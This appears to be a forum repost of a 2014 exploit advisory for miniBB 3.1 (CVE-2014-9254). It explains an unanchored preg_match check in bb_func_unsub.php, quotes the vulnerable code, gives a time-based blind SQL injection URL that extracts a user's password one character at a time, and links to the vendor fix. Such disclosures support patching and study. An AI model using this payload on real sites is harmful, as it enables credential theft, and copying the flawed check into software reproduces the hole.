Aerosol Posted December 19, 2014 Report Posted December 19, 2014 # Exploit Title: miniBB 3.1 Blind SQL Injection# Date: 23-11-2014# Software Link: http://www.minibb.com/# Exploit Author: Kacper Szurek# Contact: http://twitter.com/KacperSzurek# Website: http://security.szurek.pl/# CVE: CVE-2014-9254# Category: webapps1. Descriptionpreg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).File: bb_func_unsub.php$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);$allowUnsub=FALSE;$chkCode=FALSE;if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){ //trying to unsubscribe directly from email $chkField='email_code'; $chkVal=$_GET['code']; $userCondition=TRUE; $chkCode=TRUE;}else{ //manual unsubsribe $chkField='user_id'; $chkVal=$user_id; $userCondition=($usrid==$user_id);}if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))http://security.szurek.pl/minibb-31-blind-sql-injection.html2. Proof of Concepthttp://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != 'This SQL will check if first password character user ID=1 is c.If yes, it will sleep 5 seconds.3. Solution:http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.htmlSource Quote
